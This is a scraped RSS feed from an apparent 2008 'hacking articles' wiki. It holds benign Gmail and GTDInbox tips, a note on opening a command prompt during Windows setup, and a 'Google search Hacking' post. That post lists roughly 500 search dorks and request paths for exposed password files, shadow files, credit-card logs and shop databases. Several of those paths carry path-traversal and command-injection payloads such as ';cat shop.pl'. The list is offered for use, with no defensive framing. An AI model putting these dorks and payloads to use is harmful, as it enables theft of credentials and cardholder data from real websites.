pre-label them.  					 						On-Off Labels 					 				<br><br>	<a href="http://rahulhackingarticles.wetpaint.com/" target="_self"> 						  					</a><br> 					 In Compose, while viewing an item or on the Inbox Popup you have a list of labels - grouped into Statuses, Projects, etc. - that you can toggle on/off simply by clicking them.  					 						<br><br>Label Popup 					 				<br>	<a href="http://rahulhackingarticles.wetpaint.com/" target="_self"> 						  					</a><br><br> 					 Right click any label and you get a popup specialised for the type of label (e.g. Project, Context, Reference), that lets you see associated contacts, related files, upcoming actions or to search within that label.  					 						<br><br><br>Contact Popup 					 				<br><br>	<a class="external" href="http://rahulhackingarticles.wetpaint.comhttp://gtdinbox.com/assets/images/features-contactspop.png" rel="nofollow" target="_blank" title="Right clicking on a contact shows related projects, contexts, files and other associated contacts."> 						  					</a><br><br>Similar to the Label Popup, you can right click any contact to see related projects and contexts, files you&#39;ve exchanged, other contacts they&#39;re associated with, actions (including those you&#39;ve delegated), and to search historic communication.  					 						Contacts Manager 					 					<a href="http://rahulhackingarticles.wetpaint.com/" target="_self"> 						  					</a><br><br><br>The regular Gmail Contacts Manager has been improved to allow you to see related contacts, actions, projects and files associated with one or more people.  					 						<br><br>Refined Labels Box 					 				<br>	<a href="http://rahulhackingarticles.wetpaint.com/" target="_self"> 						  					</a><br>The regular Gmail labels box is refined to group labels by their type, such as Statuses, Projects, Contexts, References, Old items, and more.  					 						<br><br>Pre-Labelling Messages 					 				<br>	<a href="http://rahulhackingarticles.wetpaint.com/" target="_self"> 						  					</a><br><br>When you compose a message, you can click various labels you want to pre-apply. These are added to the body of your message. When the email arrives in a Gmail inbox that has GTDInbox installed (including your own), the labels are automatically added.<br><br>Visit <a class="external" href="http://rahulhackingarticles.wetpaint.comhttp://gtdinbox.com/support.htm" rel="nofollow" target="_blank">http://gtdinbox.com/support.htm </a>for the complete information.Tell us Howuseful u find dis information,start a thread now!<br><hr size="1"><br/>]]></description></item><item><title>OPEN DOS WHILE WINDOW INSTALL</title><link>http://rahulhackingarticles.wetpaint.com/page/OPEN+DOS+WHILE+WINDOW+INSTALL</link><author>rahuldutt1</author><guid isPermaLink="false">http://rahulhackingarticles.wetpaint.com/page/OPEN+DOS+WHILE+WINDOW+INSTALL</guid><pubDate>Mon, 12 May 2008 14:11:38 CDT</pubDate><description><![CDATA[<br><br>&quot;Want to see something cool?&quot;<br><div><br>hit a key combination and brought up a command prompt over the gui that was installing Vista/XP....<br><br></div><div>&quot;Whaaaaat?&quot;</div><br><br>You can open a game of Pinball or Solitaire during an install. Sound appealing to anyone? That&#39;s what I call multi-tasking :) So Shift + F10 will get you to the command prompt during an install like the shot below. It works on XP as well.<br><br><a href="http://rahulhackingarticles.wetpaint.com/page/Rahul+Answers" target="_self"> </a><br>It only works from the GUI portion and not the white text on blue background parts. I googled it and saw some speculation on using it to inject drivers or folders during your install.<br><br><br><h2 class="subTitle">MORE INFORMATION</h2><div class="sbody"> In some cases, it may be helpful to have access to a command prompt during GUI-mode Setup for the purposes of troubleshooting, copying drivers, starting and stopping services, starting tools such as Task Manager, or other for other needs.<br><br> To gain access to a command prompt during GUI-mode Setup, press SHIFT+F10.  </div><hr size="1"><br/>]]></description></item><item><title>Google search Hacking 3</title><link>http://rahulhackingarticles.wetpaint.com/page/Google+search+Hacking+3</link><author>rahuldutt1</author><guid isPermaLink="false">http://rahulhackingarticles.wetpaint.com/page/Google+search+Hacking+3</guid><pubDate>Fri, 09 May 2008 16:19:19 CDT</pubDate><description><![CDATA[1. &ldquo;Index of /admin&rdquo;<br> 2. &ldquo;Index of /password&rdquo;<br> 3. &ldquo;Index of /mail&rdquo;<br> 4. &ldquo;Index of /&rdquo; +passwd<br> 5. &ldquo;Index of /&rdquo; +password.txt<br> 6. &ldquo;Index of /&rdquo; +.htaccess<br> 7. index of ftp +.mdb allinurl:/cgi-bin/ +mailto<br> 8. administrators.pwd.index<br> 9. authors.pwd.index<br> 10. service.pwd.index<br> 11. filetype:config web<br> 12. gobal.asax index<br> 13. allintitle: &ldquo;index of/admin&rdquo;<br> 14. allintitle: &ldquo;index of/root&rdquo;<br> 15. allintitle: sensitive filetype:doc<br> 16. allintitle: restricted filetype :mail<br> 17. allintitle: restricted filetype:doc site:gov<br> 18. inurlasswd filetype:txt<br> 19. inurl:admin filetype:db<br> 20. inurl:iisadmin<br> 21. inurl:&rdquo;auth_user_file.txt&rdquo;<br> 22. inurl:&rdquo;wwwroot/*.&rdquo;<br> 23. top secret site:mil<br> 24. confidential site:mil<br> 25. allinurl: winnt/system32/ (get cmd.exe)<br> 26. allinurl:/bash_history<br> 27. intitle:&rdquo;Index of&rdquo; .sh_history<br> 28. intitle:&rdquo;Index of&rdquo; .bash_history<br> 29. intitle:&rdquo;index of&rdquo; passwd<br> 30. intitle:&rdquo;index of&rdquo; people.lst<br> 31. intitle:&rdquo;index of&rdquo; pwd.db<br> 32. intitle:&rdquo;index of&rdquo; etc/shadow<br> 33. intitle:&rdquo;index of&rdquo; spwd<br> 34. intitle:&rdquo;index of&rdquo; master.passwd<br> 35. intitle:&rdquo;index of&rdquo; htpasswd<br> 36. intitle:&rdquo;index of&rdquo; members OR accounts<br> 37. intitle:&rdquo;index of&rdquo; user_carts OR user_cart<br> 38. ALTERNATIVE INPUTS====================<br> 39. _vti_inf.html<br> 40. service.pwd<br> 41. users.pwd<br> 42. authors.pwd<br> 43. administrators.pwd<br> 44. shtml.dll<br> 45. shtml.exe<br> 46. fpcount.exe<br> 47. default.asp<br> 48. showcode.asp<br> 49. sendmail.cfm<br> 50. getFile.cfm<br> 51. imagemap.exe<br> 52. test.bat<br> 53. msadcs.dll<br> 54. htimage.exe<br> 55. counter.exe<br> 56. browser.inc<br> 57. hello.bat<br> 58. default.aspdvwssr.dll<br> 59. cart32.exe<br> 60. add.exe<br> 61. index.jsp<br> 62. SessionServlet<br> 63. shtml.dll<br> 64. index.cfm<br> 65. page.cfm<br> 66. shtml.exe<br> 67. web_store.cgi<br> 68. shop.cgi<br> 69. upload.asp<br> 70. default.asp<br> 71. pbserver.dll<br> 72. phf<br> 73. test-cgi<br> 74. finger<br> 75. Count.cgi<br> 76. jj<br> 77. php.cgi<br> 78. php<br> 79. nph-test-cgi<br> 80. handler<br> 81. webdist.cgi<br> 82. webgais<br> 83. websendmail<br> 84. faxsurvey<br> 85. htmlscript<br> 86. perl.exe<br> 87. wwwboard.pl<br> 88. www-sql<br> 89. view-source<br> 90. campas<br> 91. aglimpse<br> 92. glimpse<br> 93. man.sh<br> 94. AT-admin.cgi<br> 95. AT-generate.cgi<br> 96. filemail.pl<br> 97. maillist.pl<br> 98. info2www<br> 99. files.pl<br> 100. bnbform.cgi<br> 101. survey.cgi<br> 102. classifieds.cgi<br> 103. wrap<br> 104. cgiwrap<br> 105. edit.pl<br> 106. perl<br> 107. names.nsf<br> 108. webgais<br> 109. dumpenv.pl<br> 110. test.cgi<br> 111. submit.cgi<br> 112. guestbook.cgi<br> 113. guestbook.pl<br> 114. cachemgr.cgi<br> 115. responder.cgi<br> 116. perlshop.cgi<br> 117. query<br> 118. w3-msql<br> 119. plusmail<br> 120. htsearch<br> 121. infosrch.cgi<br> 122. publisher<br> 123. ultraboard.cgi<br> 124. db.cgi<br> 125. formmail.cgi<br> 126. allmanage.pl<br> 127. ssi<br> 128. adpassword.txt<br> 129. redirect.cgi<br> 130. cvsweb.cgi<br> 131. login.jsp<br> 132. dbconnect.inc<br> 133. admin<br> 134. htgrep<br> 135. wais.pl<br> 136. amadmin.pl<br> 137. subscribe.pl<br> 138. news.cgi<br> 139. auctionweaver.pl<br> 140. .htpasswd<br> 141. acid_main.php<br> 142. access.log<br> 143. log.htm<br> 144. log.html<br> 145. log.txt<br> 146. logfile<br> 147. logfile.htm<br> 148. logfile.html<br> 149. logfile.txt<br> 150. logger.html<br> 151. stat.htm<br> 152. stats.htm<br> 153. stats.html<br> 154. stats.txt<br> 155. webaccess.htm<br> 156. wwwstats.html<br> 157. source.asp<br> 158. perl<br> 159. mailto.cgi<br> 160. YaBB.pl<br> 161. mailform.pl<br> 162. cached_feed.cgi<br> 163. global.cgi<br> 164. Search.pl<br> 165. build.cgi<br> 166. common.php<br> 167. show<br> 168. global.inc<br> 169. ad.cgi<br> 170. WSFTP.LOG<br> 171. index.html~<br> 172. index.php~<br> 173. index.html.bak<br> 174. index.php.bak<br> 175. print.cgi<br> 176. register.cgi<br> 177. webdriver<br> 178. bbs_forum.cgi<br> 179. mysql.class<br> 180. sendmail.inc<br> 181. CrazyWWWBoard.cgi<br> 182. search.pl<br> 183. way-board.cgi<br> 184. webpage.cgi<br> 185. pwd.dat<br> 186. adcycle<br> 187. post-query<br> 188. help.cgi<br> 189. /robots.txt<br> 190. /admin.mdb<br> 191. /shopping.mdb<br> 192. /arg;<br> 193. /stats/styles.css<br> 194. /statshelp.htm<br> 195. /favicon.ico<br> 196. /stats/admin.mdb<br> 197. /shopdbtest.asp<br> 198. /cgi-bin/test.cgi<br> 199. /cgi-bin/test.pl<br> 200. /cgi-bin/env.cgi<br> 201. /photos/protest/styles.css<br> 202. http://hpcgi1.nifty.com/trino/ProxyJ/prxjdg.cgi<br> 203. /cgi-bin/whereami.cgi<br> 204. /shopping400.mdb<br> 205. /cgi/test.cgi<br> 206. /cgi-bin/test2.pl<br> 207. /photos/protest/kingmarch_02.html<br> 208. /chevy/index.htm<br> 209. /cgi-bin/glocation.cgi<br> 210. /cgi-bin/test2.cgi<br> 211. /ccbill/glocation.cgi<br> 212. /cgi-bin/styles.css<br> 213. /shopping350.mdb<br> 214. /cgi-bin/shopper.cgi<br> 215. /shopadmin.asp<br> 216. /news_2003-02-27.htm<br> 217. /cgi-bin/whois.cgi<br> 218. 3 /cgi-bin/calendar.pl<br> 219. 3 /cgi-bin/calendar/calendar.pl<br> 220. 3 /cgibin/styles.css<br> 221. 3 /venem.htm<br> 222. 2 /stats/www.newbauersflowers.com/stats/04-refers.htm<br> 223. 2 /cgi-bin/where.pl<br> 224. 2 /cgibin/shopper.cgi&amp;TEMPLATE=ORDER.LOG<br> 225. 2 /cgibin/recon.cgi<br> 226. 2 /cgibin/test.cgi<br> 227. 2 /WebShop/templates/styles.css<br> 228. 2 /stats/shopping350.mdb<br> 229. 2 /cgi-bin/mailform.cgi<br> 230. 2 /cgi-bin/recon.cgi<br> 231. 2 /chevy<br> 232. 2 /cgi-bin/servinfo.cgi<br> 233. 2 /acart2_0.mdb<br> 234. 2 /cgi-bin/where.cgi<br> 235. 2 /chevy/<br> 236. 2 /stats/www.savethemall.net/stats/19-refers.htm<br> 237. 2 /ccbill/secure/ccbill.log<br> 238. 2 /cgi/recon.cgi<br> 239. 2 /stats/www.gregoryflynn.com/chevy<br> 240. 2 /ibill/glocation.cgi<br> 241. 2 /ccbill/whereami.cgi<br> 242. 2 /ibill/whereami.cgi<br> 243. 2 /apps_trial.htm<br> 244. 2 /cgi-bin/lancelot/recon.cgi<br> 245. 2 /cgi-bin/DCShop/Orders/styles.css<br> 246. 1 /cgi-bin/htmanage.cgi<br> 247. 1 /stats/www.tysons.net/stats/05-refers.htm<br> 248. 1 /cgi-bin/mastergate/add.cgi<br> 249. 1 /cgi-bin/openjournal.cgi<br> 250. 1 /cgi-bin/calendar/calendar_admin.pl<br> 251. 1 /cgibin/ibill/count.cgi<br> 252. 1 /cgi-bin/nbmember2.cgi<br> 253. 1 /cgi-bin/mastergate/count.cgi<br> 254. 1 /cgi-bin/mastergate/accountcreate.cgi<br> 255. 1 /cgi-bin/ibill/accountcreate.cgi<br> 256. 1 /cgibin/MasterGate2/count.cgi<br> 257. 1 /cgi-bin/amadmin.pl<br> 258. 1 /cgibin/mailform.cgi<br> 259. 1 /cgibin/mastergate/count.cgi<br> 260. 1 /cgibin/harvestor.cgi<br> 261. 1 /cgibin/igate/count.cgi<br> 262. 1 /WebShop<br> 263. 1 /shopdisplaycategories.asp<br> 264. 1 /cgi-bin/DCShop/Orders/orders.txt<br> 265. 1 /cgi-bill/revshare/joinpage.cgi<br> 266. 1 /stats/www.gregoryflynn.com/stats/19-refers.htm<br> 267. 1 /cgi-local/DCShop/auth_data/styles.css<br> 268. 1 /cgi-bin/add-passwd.cgi<br> 269. 1 /cgi-bin/MasterGate/count.cgi<br> 270. 1 /apps_shop.htm%20/comersus/database/comersus.mdb<br> 271. 1 /data/verotellog.txt<br> 272. 1 /epwd/ws_ftp.log<br> 273. 1 /stats/www.dialacure.com/stats/16-refers.htm<br> 274. 1 /cgi/MasterGate2/count.cgi<br> 275. 1 /jump/rsn.tmus/skybox;sz=140&times;150;segment=all;resor=jackson;state= WY;sect=home;tile=8;ord=57019<br> 276. 1 /wwii/styles.css<br> 277. 1 /cgi-bin/admin.mdb<br> 278. 1 /stats/www.gregoryflynn.com/stats/31-refers.htm<br> 279. 1 /cgi-bin/ibill-tools/count.cgi<br> 280. 1 /WebShop/templates/cc.txt<br> 281. 1 /cgibin/ibill/accountcreate.cgi<br> 282. 1 /cgi-bin/count.cgi<br> 283. 1 /cgi-local/DCShop/auth_data/auth_user_file.txt<br> 284. 1 /cgi/mastergate/count.cgi<br> 285. 1 /cgi-bin/EuroDebit/addusr.pl<br> 286. 1 /cgi-bin/dbm-passwd.cgi<br> 287. 1 /cgi/igate/accountcreate.cgi<br> 288. 1 /cgi-bin/store/Log_files/your_order.log<br> 289. store/log_files/your_order.log<br> 290. /cgi-bin/DCShop/Orders/orders.txt<br> 291. /vpasp/shopdbtest.asp<br> 292. /orders/checks.txt<br> 293. /WebShop/logs<br> 294. /ccbill/secure/ccbill.log<br> 295. /scripts/cart32.exe<br> 296. /cvv2.txt<br> 297. /cart/shopdbtest.asp<br> 298. /cgi-win/cart.pl<br> 299. /shopdbtest.asp<br> 300. /WebShop/logs/cc.txt<br> 301. /cgi-local/cart.pl<br> 302. /PDG_Cart/order.log<br> 303. /config/datasources/expire.mdb<br> 304. /cgi-bin/ezmall2000/mall2000.cgi?page=../mall_log_files/order.log%00html<br> 305. /orders/orders.txt<br> 306. /cgis/cart.pl<br> 307. /webcart/carts<br> 308. /cgi-bin/cart32.exe/cart32clientlist<br> 309. /cgi/cart.pl<br> 310. /comersus/database/comersus.mdb<br> 311. /WebShop/templates/cc.txt<br> 312. /Admin_files/order.log<br> 313. /orders/mountain.cfg<br> 314. /cgi-sys/cart.pl<br> 315. /scripts/cart.pl<br> 316. /htbin/cart.pl<br> 317. /productcart/database/EIPC.mdb<br> 318. /shoponline/fpdb/shop.mdb<br> 319. /config/datasources/myorder.mdb<br> 320. /PDG_Cart/shopper.conf<br> 321. /shopping/database/metacart.mdb<br> 322. /bin/cart.pl<br> 323. /cgi-bin/cart32.ini<br> 324. /database/comersus.mdb<br> 325. /cgi-local/medstore/loadpage.cgi?user_id=id&amp;file=data/orders.txt<br> 326. /cgi-bin/store/Admin_files/myorderlog.txt<br> 327. /cgi-bin/orders.txt<br> 328. /cgi-bin/store/Admin_files/your_order.log<br> 329. /test/test.txt<br> 330. /fpdb/shop.mdb<br> 331. /cgibin/shop/orders/orders.txt<br> 332. /shopadmin1.asp<br> 333. /cgi-bin/shop.cgi<br> 334. /cgi-bin/commercesql/index.cgi?page=../admin/manager.cgi<br> 335. /cgi-bin/PDG_cart/card.txt<br> 336. /shopper.cgi?preadd=action&amp;key=PROFA&amp;template=order1.log<br> 337. /store/shopdbtest.asp<br> 338. /log_files/your_order.log<br> 339. /_database/expire.mdb<br> 340. /HyperStat/stat_what.log<br> 341. /cgibin/DCShop/auth_data/auth_user_file.txt<br> 342. /htbin/orders/orders.txt<br> 343. /SHOP/shopadmin.asp<br> 344. /index.cgi?page=../admin/files/order.log<br> 345. /vpshop/shopadmin.asp<br> 346. /webcart/config<br> 347. /PDG/order.txt<br> 348. /cgi-bin/shopper.cgi<br> 349. /orders/order.log<br> 350. /orders/db/zzzbizorders.log.html<br> 351. /easylog/easylog.html<br> 352. /cgi-bin/store/Log_files/your_order.log<br> 353. /cgi-bin/%20shopper.cgi?preadd=action&amp;key=PROFA&amp;template=shopping400.mdb<br> 354. /comersus_message.asp?<br> 355. /orders/import.txt<br> 356. /htbin/DCShop/auth_data/auth_user_file.txt<br> 357. /admin/html_lib.pl<br> 358. /cgi-bin/%20shopper.cgi?preadd=action&amp;key=PROFA&amp;template=myorder.txt<br> 359. /cgi-bin/DCShop/auth_data/auth_user_file.txt<br> 360. /cgi-bin/shop.pl/page=;cat%20shop.pl<br> 361. /cgi-bin/shopper?search=action&amp;keywords=dhenzuser%20&amp;template=order.log<br> 362. /HBill/htpasswd<br> 363. /bin/shop/auth_data/auth_user_file.txt<br> 364. /cgi-bin/cs/shopdbtest.asp<br> 365. /mysql/shopping.mdb<br> 366. /Catalog/config/datasources/Products.mdb<br> 367. /trafficlog<br> 368. /cgi/orders/orders.txt<br> 369. /cgi-local/PDG_Cart/shopper.conf<br> 370. /store/cgi-bin/Admin_files/expire.mdb<br> 371. /derbyteccgi/shopper.cgi?key=SC7021&amp;preadd=action&amp;template=order.log<br> 372. /derbyteccgi/shopper.cgi?search=action&amp;keywords=moron&amp;template=order.log<br> 373. /cgi-bin/mc.txt<br> 374. /cgi-bin/mall2000.cgi<br> 375. /cgi-win/DCShop/auth_data/auth_user_file.txt<br> 376. /cgi-bin/shopper.cgi?search=action&amp;keywords=root%20&amp;template=order.log<br> 377. /store/commerce.cgi<br> 378. /scripts/shop/orders/orders.txt<br> 379. /product/shopping350.mdb<br> 380. /super_stats/access_logs<br> 381. /cgi-local/orders/orders.txt<br> 382. /cgi-bin/PDG_Cart/mc.txt<br> 383. /cgibin/cart32.exe<br> 384. /cgi-bin/Shopper.exe?search=action&amp;keywords=psiber%20&amp;template=other/risinglogorder.log<br> 385. /cgibin/password.txt<br> 386. /Catalog/cart/carttrial.dat<br> 387. /catalog/Admin/Admin.asp<br> 388. /ecommerce/admin/user/admin.asp<br> 389. /data/productcart/database/EIPC.mdb<br> 390. /store/admin_files/commerce_user_lib.pl<br> 391. /cgi-bin/store/index.cgi<br> 392. /paynet.txt<br> 393. /config/datasources/store/billing.mdb<br> 394. /_database/shopping350.mdb<br> 395. /cgi-bin/shopper.exe?search<br> 396. /cgi/shop.pl/page=;cat%20shop.pl<br> 397. /cgi-bin/store/Admin_files/orders.txt<br> 398. /cgi-bin/store/commerce_user_lib.pl<br> 399. /cgi-sys/pagelog.cgi<br> 400. /cgi-sys/shop.pl/page=;cat%20shop.pl<br> 401. /scripts/weblog<br> 402. /fpdb/shopping400.mdb<br> 403. /htbin/shop/orders/orders.txt<br> 404. /cgi-bin/%20shopper.cgi?preadd=action&amp;key=PROFA&amp;template=myorder.log<br> 405. /cgi-bin/shopper.exe?search=action&amp;keywords=psiber&amp;template=order.log<br> 406. /mall_log_files/<br> 407. /cgi-bin/perlshop.cgi<br> 408. /tienda/shopdbtest.asp<br> 409. /cgi-bin/%20shopper.cgi?preadd=action&amp;key=PROFA&amp;template=shopping.mdb<br> 410. /cgi-bin/shopper.cgi?search=action&amp;keywords=whinhall&amp;template=order.log<br> 411. /WebShop/logs/ck.log<br> 412. /fpdb/shopping300.mdb<br> 413. /mysql/store.mdb<br> 414. /cgi-bin/store/Admin_files/commerce_user_lib.pl<br> 415. /config.dat<br> 416. /order/order.log<br> 417. /commerce_user_lib.pl<br> 418. /Admin_files/AuthorizeNet_user_lib.pl<br> 419. /cvv2.asp<br> 420. /cgi-bin/cart32/CART32-order.txt<br> 421. /wwwlog<br> 422. /cool-logs/mlog.html<br> 423. /cgi-bin/pass/merchant.cgi.log<br> 424. /cgi-local/pagelog.cgi<br> 425. /cgi-bin/pagelog.cgi<br> 426. /cgi-bin/orders/cc.txt<br> 427. /cgis/shop/orders/orders.txt<br> 428. /admin/admin_conf.pl<br> 429. /cgi-bin/pdg_cart/order.log<br> 430. /cgi/PDG_Cart/order.log<br> 431. /Admin_files/ccelog.txt<br> 432. /cgi-bin/orders/mc.txt<br> 433. /cgi/cart32.exe<br> 434. /ecommerce/admin/admin.asp<br> 435. /scripts/DCShop/auth_data/auth_user_file.txt<br> 436. /Catalog/config/datasources/Expire.mdb<br> 437. /ecommerce/admin/shopdbtest.asp<br> 438. /mysql/mystore.mdb<br> 439. /cgi-bin/%20shopper.cgi?preadd=action&amp;key=PROFA&amp;template=shopping.asp<br> 440. /cgi-bin/commercesql/index.cgi?page=../admin/files/order.log<br> 441. /cgi-bin/Count.cgi?df=callcard.dat<br> 442. /logfiles/<br> 443. /shopping/shopping350.mdb<br> 444. /admin/configuration.pl<br> 445. /cgis/DCShop/auth_data/auth_user_file.txt<br> 446. /cgis/cart32.exe<br> 447. /cgi-bin/dcshop.cgi<br> 448. /cgi-win/shop/auth_data/auth_user_file.txt<br> 449. /shopping400.mdb<br> 450. /HBill/config<br> 451. /cgi-bin/shop/index.cgi?page=../admin/files/order.log<br> 452. /search=action&amp;keywords=GSD%20&amp;template=order.log<br> 453. /WebCart/orders.txt<br> 454. /PDG_Cart/authorizenets.txt<br> 455. /cgi-bin/AnyForm2<br> 456. /~gcw/cgi-bin/Count.cgi?df=callcard.dat<br> 457. /cgi-bin/PDG_Cart/order.log<br> 458. /expire.mdb<br> 459. /logger/<br> 460. /webcart-lite/orders/import.txt<br> 461. /cgi-bin/commercesql/index.cgi?page=../admin/admin_conf.pl<br> 462. /cgi-bin/PDG_Cart/shopper.conf<br> 463. /cgi-bin/cart32.exe<br> 464. /dc/orders/orders.txt<br> 465. /cgi-local/DCShop/orders/orders.txt<br> 466. /shop.pl/page=shop.cfg<br> 467. /cgi-local/cart32.exe<br> 468. /cgi-win/pagelog.cgi<br> 469. /cgi-win/shop/orders/orders.txt<br> 470. /cgibin/shopper.cgi?search=action&amp;keywords=moron&amp;template=order.csv<br> 471. /cgi-sys/DCShop/auth_data/auth_user_file.txt<br> 472. /cgi-bin/www-sql;;;<br> 473. /cgi-bin/%20shopper.cgi?preadd=action&amp;key=PROFA&amp;template=order.log<br> 474. /scripts/orders/orders.txt<br> 475. /cgi-local/shop.pl/shop.cfg<br> 476. /search=action&amp;keywords=cwtb%20&amp;template=expire.mdb<br> 477. /php/mylog.phtml<br> 478. /config/datasources/shopping.mdb<br> 479. /php-coolfile/action.php?action=edit&amp;file=config.php<br> 480. /cgi-bin/ezmall2000/mall2000.cgi<br> 481. /cgi/DCShop/orders/orders.txt<br> 482. /cgi-local/shop.pl<br> 483. /cgis/DCShop/orders/orders.txt<br> 484. /product/shopdbtest.asp<br> 485. /ASP/cart/database/metacart.mdb<br> 486. /cgi-bin/cgi-lib.pl<br> 487. /cgi-bin/mailview.cgi?cmd=view&amp;fldrname=inbox&amp;select=1&amp;html<br> 488. /search=action&amp;keywords=cwtb%20&amp;template=order.log<br> 489. /mysql/expire.mdb<br> 490. /scripts/shop/auth_data/auth_user_file.txt<br> 491. /cgi-bin/cart32/whatever-OUTPUT.txt<br> 492. /Shopping%20Cart/shopdbtest.asp<br> 493. /cgi/shop/auth_data/auth_user_file.txt<br> 494. /shop/shopping350.mdb<br> 495. /cgi-bin/store/Authorize_Net.pl<br> 496. /scripts/DCShop/orders/orders.txt<br> 497. /store/log_files/commerce_user_lib.pl<br> 498. /shopping/shopadmin.asp<br> 499. /cgi-bin/orderlog.txt<br> 500. /cgi-bin/webcart/webcart.cgi?CONFIG=mountain&amp;CHANGE=YES&amp;NEXTPAGE=;cat%20../../webcart/system/orders/orders.txt|&amp;CODE=PHOLD;;;<br> 501. /cool-logs/mylog.html<br> 502. /cgibin/shop.pl/page=;cat%20shop.pl<br> 503. /htbin/shop.pl/page=;cat%20shop.pl<br> 504. /cgi-win/orders/orders.txt<br> 505. /cgi-bin/%20shopper.cgi?preadd=action&amp;key=PROFA&amp;template=order1.txt<br> 506. /SHOP/shopdbtest.asp<br> 507. /cgi/pagelog.cgi<br> 508. /php/mlog.phtml<br> 509. /cgi-bin/shop/apdproducts.mdb<br> 510. /htbin/shop/auth_data/auth_user_file.txt<br> 511. /server%20logfile;;;<br> 512. /database/metacart.mdb<br> 513. /cgi-local/shop/orders/orders.txt<hr size="1"><br/>]]></description></item><item><title>Gmail &quot; Google Mail&quot;</title><link>http://rahulhackingarticles.wetpaint.com/page/Gmail+%22+Google+Mail%22</link><author>rahuldutt1</author><guid isPermaLink="false">http://rahulhackingarticles.wetpaint.com/page/Gmail+%22+Google+Mail%22</guid><pubDate>Fri, 09 May 2008 12:31:25 CDT</pubDate><description><![CDATA[ 			<br><br> <br><br><br><br>  <b>आईये </b><b>जीमेल </b><b>में </b><b>अदृश्य </b><b>हो </b><b>जायें</b><br>Go &quot;Invisible&quot; in Gmail, Like Yahoo Messenger ! <br> क्या आप भी जीमेल में कईयों की तरह मेल चैक करने आते हैं और आपके ओनलाईन होते ही मित्रों से चैट करने को मजबूर हो जाते हैं? क्या आप याहू मेसेन्जर की तरह इनविजिबल रहकर अपने किसी मित्र से चैट करना चाहते हैं? <br> आईये!!! इसका इलाज हमने ने खोज निकाला है ,मैं आप सबको बता रहा हूँ। <br> सबसे पहले जाँच लीजिये कि आपने जीमेल का नया वर्जन प्रयोग कर रहे हैं। अब Setting में जाकर भाषा में English US पसन्द कर लीजिये <br> <br> <br> और अब इसे सेव कर लीजिये। <br>बस आपका काम हो चुका है, जहां से आप अपना स्टेटस बदलते हैं, वहाँ जा कर देख लीजिये.. <br> Invisible पर क्लिक करिये... देखिये आप औरों के लिये अदृश्य हो चुके हैं। <br> <br>जीमेल में इस तरीके से Invisible रहते हुए अगर जीटॉक लोगिन किया जाये तो यह संदेश मिलता है Oops! You are not invisible because you&#39;re also using desktop software that doesn&#39;t support invisibility, such as Google Talk.<br>-- <br> regards<br> Rahul Dutt Avasthy<br> Cyber Security and Forensic Consultant<br> website:http://rahulhackingarticles.wetpaint.com/  <br><br><br><h3>  <i><b>Tips and Tricks about GMAIL</b></i></h3><i>Keep scrolling down it goes Better : Rahul Dutt Avasthy</i>   <br><br><br><br><b>While Web-based email is nothing new, Gmail introduces some new and unique concepts. Managing email has become very easy while at the same time having powerful tools to find and review information. </b><br><br><h3>  1.) Advertizing: </h3><b>  <br></b><br><b>This is probably the single most controversial aspect of Gmail. Opponents have said that Google&#39;s approach to inserting ads based on message content is a huge privacy breach. </b><br><b>Gmail does not &quot;read&quot; your email. Gmail does not breach your privacy. Gmail does not care about your message content. All Gmail is doing is running your message through a &quot;processor&quot; that looks for ad-related keywords so that it can display unobtrusive targeted ads. </b><br><b>Another important point about Gmail&#39;s ads is that they are VERY unobtrusive. They are much like the &quot;Sponsored ads&quot; you see on the right of a Google Search results screen. In fact, they don&#39;t even show up on every email message that you read, and so far, that&#39;s the only place you see the ads: when reading messages. They don&#39;t appear in any other screen. Gmail&#39;s ads are FAR less annoying than the flashy lights and huge billboards that services like Yahoo Mail and Hotmail use. And, given that the ads are intended to be targeted based on message content, you shouldn&#39;t see inapropriate or unrelated ads. </b><br><br><h3>  2.) Reading Messages: </h3><b>  <br></b><br><b>Note a couple things: First, no external graphics are displayed. By default, Gmail disables displaying externally referenced graphics. The reason is that many spam messages contain externally referenced graphics. When they are displayed, the email sender can use this to track that you opened the message thus validating your email address for future spam. Clicking on the &quot;Display External Images&quot; link will display the images if you want. </b><br><b>There is one glaring problem: If the original email is HTML or Rich Text formatted, Gmail will strip out ALL formatting including links, fonts, and images. ie: you can only reply in plain text. </b><br><br><h3>  3.) Archiving :</h3><b>  <br></b><br><b>One of the first concepts that you have to get used to with Gmail is that of &quot;Archiving&quot;. The overall power of Gmail is in its message management, searching and archival capabilities. With 1GB of storage, the average email user will have enough storage space to hold several years worth of emails. Yes, there will always be emails that you simply don&#39;t want to keep. </b><br><b>Archiving a message simply tells Gmail to remove the message from your Inbox screen and keep it in your &quot;All Mail&quot; screen. All emails will remain in your inbox until you specifically &quot;Archive&quot; them. Archiving simply removes the message from your inbox screen.But what happens to it? Don&#39;t worry, all messages are always accessible through the &quot;All Mail&quot; screen. Archiving simply cleans up your inbox. Once a message has been archived, should you ever want to, you can easily move it back to the inbox, but there really isn&#39;t a need for that.</b><br><br><h3>  4.) Labels :</h3><b>  <br><br></b><b>A Label is a way of classifying an email. It&#39;s similar to &quot;folders&quot; but it goes much farther: You can optionally assign a user-definable Label to any email. Then, when you click on a specific label in the label list on the left of the screen, Gmail displays only those emails under that label. Sounds a lot like folders, right? </b><br><b>The power of Labels shows in being able to assign multiple labels to an email. When you organize emails in folders, an email can reside in only one folder at a time. Say you have one folder called &quot;Family&quot; and another called &quot;Jokes&quot;. Your brother sends you a joke email, so where do you put it--the Family folder or the Jokes folder? Gmail&#39;s Labels let you assign multiple labels to each email, so you could label your brother&#39;s joke email with both &quot;Family&quot; AND &quot;Jokes&quot; labels. </b><br><b>At first, this may not seem too exciting, but after a while, you will see how this could be very powerful, especially with large numbers of accumulated emails. </b><br><br><br><blockquote>  <blockquote>  <h3 align="center">  Gmail Tip #1: All About Labels</h3>  <div align="center">  </div>  <div align="center">  </div></blockquote></blockquote><b>You can add a Label to a message in one of two ways:   <br>If you are viewing a message listing, you can just click the checkbox next to the message, click on the &quot;Apply label...&quot; dropdown, and select the Label you want to apply. Gmail will display the Label just to the left of the message&#39;s Subject.<br>If you are viewing a message, just click on the &quot;Apply label...&quot; dropdown, and select the label you want to apply. Gmail will display the new label to the right of the Subject line.</b><br><b>OK, you assigned a Label to a message, but at a later time, you want to remove it. How do you do that? Just select the Label view from the Labels box on the left, &quot;select&quot; the specific message by clicking the checkbox next to the message, and then click on the &quot;Remove label &#39;xxxx&#39;&quot; button at the top of the listing. Your label has now been removed! </b><br><br><br><h3 align="center">  Gmail Tip #2: How to Maintain &#39;Notes&#39;<br><br></h3><b>  <br></b><br><b>Some email providers provide a &quot;Notes&quot; function to let you maintain a list of notes. For example you might keep Web site links, random thoughts, etc. 